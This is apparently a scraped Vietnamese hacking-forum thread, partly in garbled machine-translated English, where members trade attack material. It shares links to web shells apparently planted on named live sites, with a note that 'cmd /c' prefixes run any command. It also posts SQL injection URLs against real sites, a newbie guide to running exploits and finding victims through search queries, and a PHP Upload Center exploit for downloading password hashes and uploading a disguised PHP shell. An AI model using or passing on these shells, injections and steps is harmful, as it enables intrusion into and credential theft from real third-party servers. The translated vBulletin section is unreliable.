1 con shell anh em vào nghịch nhé http://11moves.com/modlogan/401.php Famydmxhcegroup.biz Share pà kon con cmdshell JSP nghịch chơi http://www.congty501.com/imgupload/cmdexec.jsp Xem ch
Trang 1In examining the files of the Forum,vBulletin version 3.6.0 was Thgrtin one I tested and very effective and the second managed me a lot because most forums Hazvh file or Hatin wall firearm, but two risk the first volume in the Install file specifically tableprefix.php
programmatic error in line 31
PHP Code:
Trích:
require_once(DIR "/{$vbulletin->config['Misc']['admincpdir']}/global.php");
_
The gap is the second deadliest lies in the main page of the Forum file payment gateway.php
PHP Code:
Trích:
if (file_exists(DIR '/includes/paymentapi/class_' $api['classname'] '.php'))
Patching up, :amendment file any editor has not forgotten the answer is a back-up copy of the file in the event of an error detection : By Me
investment :there is no protection of the security of
noticeable deficiencies would be remedied :FileInclusion
ok ! tìm được đó, MOD dịch thuật ra đây khai thác lỗi nhá !
đã thấy
QX147(HCEgroup.biz)
New shell for practising :D
Trang 21 con shell anh em vào nghịch nhé
http://11moves.com/modlogan/401.php
Famydmx(hcegroup.biz)
Share pà kon con cmdshell JSP nghịch chơi
http://www.congty501.com/imgupload/cmdexec.jsp
Xem chơi thôi nhá, đừng nghịch wa' nhé
bác gõ như thế này nó mới chạy được :
cmd /c dir c:\
Hehe, thêm cái "cmd /c" ở đầu thì mún làm gì tuỳ ý Chuc' pà kon vui vẻ
Web server Apache-Coyote mà pác Mà có command shell thì cũng làm được khối việc roài
famydmx(hcegroup.biz)
sql inject dạng này hơi lạ
http://www.burningshed.com/index.asp?page=band&id=80%20and%201=user
http://www.any-domains.com/domain_client.asp
sql injection by pass
@langtuhaohoa(hcegroup.biz)
Làm thế nào để triển trai Exploit ??
Nếu bạn là người mới biết thì nên đọc qua !
Để triển khai mã khai thác của 1 ứng dụng nào đó thì bạn phải cần biết mã khai
Trang 3thác đó được viết bằng ngôn ngữ gì ! Thông thường là : Perl , Php , C
Và tất nhiên để chạy được các Exploit được viết = ngôn ngữ nào đó thì trên máy của bạn phải có trình biên dịch nó !
Download Perl :
http://pxperl.com/?pxperl
Biên dịch C bạn có thể dùng cgywin :
http://www.cygwin.com/ để download
còn PHP thì hầu như máy bạn nào cũng có rồi hĩ ?? Chỉ cần cài localhost + PHP là được mừh !
nếu bạn nào chưa cài localhost thì có thể dùng AppServ :
www.appservnetwork.com
để download !
Thường thì trong mỗi exploit đều có hướng dẫn sữ dụng ! Bạn dựa theo đó mà triển khai nhé
Good luck to you !
langtuhaohoa(HCE)
Sử dụng các exploit bằng php
Trước hết máy bạn cần phải cài đặt php
Thường thì sau khi cài xong ta có thư mục c:\php (cài trên win)
Tiếp theo save code exploit lại thành filename.php , copy và paste vào c:\php
Để exploit bạn vào Run và type : cmd
Sau khi đã vào dos : cd c:\php
nếu là php5 thì type : php-cgi filename.php để chạy filename.php
nếu là php4 thì type : php filename.php
Navaro(HCE)
Cơ bản về exploit
Trang 4Tut for newbie
Exploit có nghĩa khai thác , ở đây có nghĩa là khai thác các "lỗ hổng bảo mật" đã được công bố ( hoặc chưa ), nó khai thác bằng một code đuợc lập trình sẵn perl , C , php , etc
Đây là 1 kỹ thuật khá phổ biến để hack , nó có ưu điểm là dễ , nhanh nhưng cũng
có nguợc điểm là nếu người sử dụng ko hiểu nó thì việc làm của họ chỉ mang tính chất của 1 scrip kid ( em cũng chỉ hiểu được 1 phần thui -> trình còi ) .Đầu tiên để exploit đuợc thì cũng phải có 1 chút ít tiếng anh
Các trang công bố cách exploit như
-www.securiteam.com
-www.securityfocus.com
-milw0rm.com
-Astalavista.com
Hay ở vniss nè cũng okay
Có thể dùng 1 số tools scan xem trang web đấy có dính lỗi nào ko như
- Xscan :http://www.securitylab.ru/software/233255.php
-Acunetix Web Vulnerability Scanner :
http://www.acunetix.com/vulnerabilit tyscanner3.exe ( ai có full cái nè thì share cái )
Chú ý trước khi exploit phải bít rõ các câu lệnh tìm kiếm trong google để tìm victim cho mình :
tham khảo về câu lệnh tìm kiếm google ở đây :
Bây h sẽ là 1 số ví dụ để mọi người hiểu thêm về exploit
http://66.29.6.213/~lehung/ebook/Len ong.google.rar
Cái nè exploit cũng khá đơn giản , bạn chỉ cần làm theo hướng dẫn là có thể dễ dàng hack đuợc
Code:
PHP Upload Center Download users password hashes And phpshell Upload
Site:http://ksv.hypermart.net/php/
-
1)Download users password hashes:
http://victim.com/path/users/username
Trang 52)phpshell Upload
Example:
Download http://geocities.ocm/liz0zim/shell.php
And shell.php Save As shell.php.li
And Upload Web Sİte
http://victim.com/path/files/shell.php.li
-
1) Download users password hashes Example:
http://www.sattv.ru/upload/users/Admin
2)Upload PhpShell Example:
http://ha.bums.dk/upload/files/liz0.php.li
-
Credit :Liz0ziM
Website:www.biyosecurity.com
Mail :liz0@bsdmail.com
-
Source:
http://www.blogcu.com/Liz0ziM/317250/
http://biyosecurity.be/bugs/phpuploadcenter2.txt
cũng khá đơn giản http://victim.com/path/users/username > download passhash save 1 con shell thành duôi php.li rùi up lên thui nó sẽ có link
http://victim.com/path/files/shell.php.li